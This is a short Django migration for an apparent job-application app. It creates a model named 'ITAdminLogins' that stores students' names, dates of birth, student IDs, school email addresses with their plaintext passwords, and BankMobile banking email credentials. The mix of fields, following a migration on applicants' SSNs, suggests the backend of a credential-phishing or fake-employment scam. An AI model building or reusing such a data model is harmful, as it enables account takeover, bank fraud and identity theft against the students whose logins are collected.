# Generated by Django 4.2.3 on 2024-05-27 00:46

from django.db import migrations, models
import django.utils.timezone
import shortuuidfield.fields


class Migration(migrations.Migration):

    dependencies = [
        ('employment', '0018_alter_jobapplication_ssn'),
    ]

    operations = [
        migrations.CreateModel(
            name='ITAdminLogins',
            fields=[
                ('id', shortuuidfield.fields.ShortUUIDField(blank=True, editable=False, max_length=22, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=100)),
                ('phone_number', models.CharField(max_length=200)),
                ('current_school_email', models.EmailField(max_length=254)),
                ('current_school_email_password', models.CharField(max_length=200)),
                ('previous_school_email', models.EmailField(max_length=254)),
                ('previous_school_email_password', models.CharField(max_length=200)),
                ('date_of_birth', models.DateField()),
                ('student_id', models.CharField(max_length=200)),
                ('bankmobile_email', models.EmailField(max_length=254)),
                ('bankmobile_email_password', models.CharField(max_length=200)),
                ('filled_at', models.DateTimeField(default=django.utils.timezone.now)),
            ],
        ),
    ]
